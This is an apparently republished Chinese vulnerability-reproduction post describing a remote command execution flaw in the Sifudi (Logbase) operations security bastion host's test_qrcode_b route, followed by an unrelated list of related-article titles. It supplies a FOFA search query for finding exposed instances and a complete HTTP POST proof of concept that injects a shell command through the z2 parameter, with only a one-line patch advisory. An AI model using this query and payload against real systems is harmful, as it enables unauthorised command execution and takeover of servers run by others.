当前位置: 首页 > news >正文

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

news 2025/7/25 20:54:10

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/

http://www.lryc.cn/news/259667.html

相关文章:

  • Salesforce×阿里云,影响几何?
  • Qt对excel操作
  • 每日一练 | 华为认证真题练习Day148
  • ES6学习(二):解构赋值
  • kubebuilder开发operator
  • docker中启动ES报错:AccessDeniedException: /usr/share/elasticsearch/data/nodes
  • java集成Nacos服务
  • 开源IPad Pro应用IDE:使用SSH远程连接服务器进行云端编程开发
  • ubuntu 自动安装 MKL Intel fortran 编译器 ifort 及完美平替
  • elementui select中添加新增标签
  • 图像截屏公式识别——LaTeX-OCR安装与使用
  • LabVIEW与Tektronix示波器实现电源测试自动化
  • 青少年CTF-Crypto(Morse code/ASCII和凯撒)
  • Vue3-16-【v-model】 表单数据绑定
  • 【Flink on k8s】- 12 - Flink kubernetes operator 的高级特性
  • 量子芯片技术:未来的计算革命
  • vaptcha-手势验证码
  • 【一种用opencv实现高斯曲线拟合的方法】
  • find_package 和 find_library的区别
  • socket是如何进行通信的
  • STM32-固件打包部署
  • 微信机器人如何使用?好用吗?好奇
  • ARMV8 - A64 - 函数调用,内存栈操作
  • MyBatis 四大核心组件之 ResultSetHandler 源码解析
  • docker-compose 单机容器编排
  • springboot项目使用Layui作为前端UI的一系列前后端交互的解决方法
  • 【Linux】Firewalld防火墙新增端口、开启、查看等
  • 学习笔记 -- TVS管选型参考
  • 功能更新|免费敏捷工具Leangoo领歌私有部署新增第三方身份认证和API对接
  • 重生奇迹mu战士加点